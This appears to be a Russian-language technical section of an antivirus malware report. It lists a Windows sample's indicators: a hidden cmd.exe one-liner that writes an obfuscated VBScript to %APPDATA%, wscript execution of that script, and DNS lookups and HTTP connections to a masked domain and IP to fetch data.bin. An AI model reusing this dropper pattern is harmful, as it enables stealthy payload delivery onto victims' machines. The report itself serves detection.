Техническая информация
- '<SYSTEM32>\cmd.exe' /V /C set "Skbd4oO=%APPDATA%\%RANDOM%.vbs" && (for %i in ("DIm Bds8MoV" "sUB YB(FlR)" "VnM=58" "diM Xfo" "DT6QfX=23" "LOUxP="NIXLmaj"" "L2AOoU=85" "seT Xfo=cReateobJect(BXL("081C032923441D3D2A2...
- %APPDATA%\30125.vbs
- 'pa###louf.com':80
- '20#.#7.8.251':80
- http://pa###louf.com/data.bin
- DNS ASK pa###louf.com
- '<SYSTEM32>\wscript.exe' "%APPDATA%\30125.vbs"
- '<SYSTEM32>\cmd.exe' /V /C set "Skbd4oO=%APPDATA%\%RANDOM%.vbs" && (for %i in ("DIm Bds8MoV" "sUB YB(FlR)" "VnM=58" "diM Xfo" "DT6QfX=23" "LOUxP="NIXLmaj"" "L2AOoU=85" "seT Xfo=cReateobJect(BXL("081C032923441D3D2A2...' (со скрытым окном)